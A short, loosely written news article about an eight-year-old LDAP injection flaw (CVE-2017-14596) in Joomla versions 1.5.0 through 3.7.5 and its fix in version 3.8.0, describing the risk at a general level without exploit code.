Joomla is one of the leading open-source Content Management System (CMS). For the last eight years, it was having a CMS bug. The CMS bug can be dangerous because it can be used to steal vital information in terms of the account. This can result in the compromising of the website domains.
Recently, the provider of the CMS has issued a security advisory. It comprises of the details about the flaw. As per the report, the type of exploitation is mentioned as issues with the information disclosure. This happens due inefficient to LDAP Authentication Plug-in.
What Is Information Disclosure?
Information disclosure is defined as the leakage of the vital and confidential information like the username and the password of a particular user. For any website user, both of this information is the most important.
As a result of this bug, the popularity of Joomla was going down. As per the considerations of Joomla, the bug was of medium severity. On contrary, the researchers of RIPS technologies stated that the problem was critical.
What Are The Affected Installs And Solutions?
As per the security announcements, the affected installs were the outdated versions of CMS which were 1.5.0 through 3.7.5. Due to the usage of the outdated CMS version, the bug was taking place. As a measure to fix this issue the solution which is stated in the security announcement is the up gradation of the CMS version to 3.8.0.
LP is also known as Lightweight Directory Access Protocol. Joomla uses it to get access to the directories over TCP/IP. This particular plug-in is merged with the Content Management System (CMS).
Team Joomla, in one of their blogs, mentioned about the vulnerability regarding the LDAP injection with respect to the login controller plug-in. According to them, the attacker may use the blind injection technique. By this technique, they can easily get a control on the on the older versions of CMS.
The Flaw CVE-2017-14596
The flaw of Joomla in the in the NDV is mentioned as CVE-2017-14596. It clearly states the same problem mentioned above. The older versions are easy to crack because of the scarce LDAP authentication.
About The Attackers
Attackers are mainly able to hijack the super password to get access to the administrator’s control panel of the CMS of Joomla. They need no privileges for bug exploitation. There are numerous dangers that Joomla can face. By the extracted information which the hijacker can develop the total control over Joomla.
Joomla And Server Compromise
Joomla generally receives uncountable numbers of code reviews from the community based for security. It gets the codes for being the leading open-source CMS applications. According to the RIPS, only one miss on the security vulnerability can cause a server compromise due to the hamper on 50,000 lines of codes.
About The Fixes
The eight-year-old bug has recently been fixed by the Joomla team updating the server to 3.8.0. It was of much need because the outdated version which pre-existed created the problem.
After this update, the Joomla CMS system is secured to work upon. Know where to find Resources and Plugins.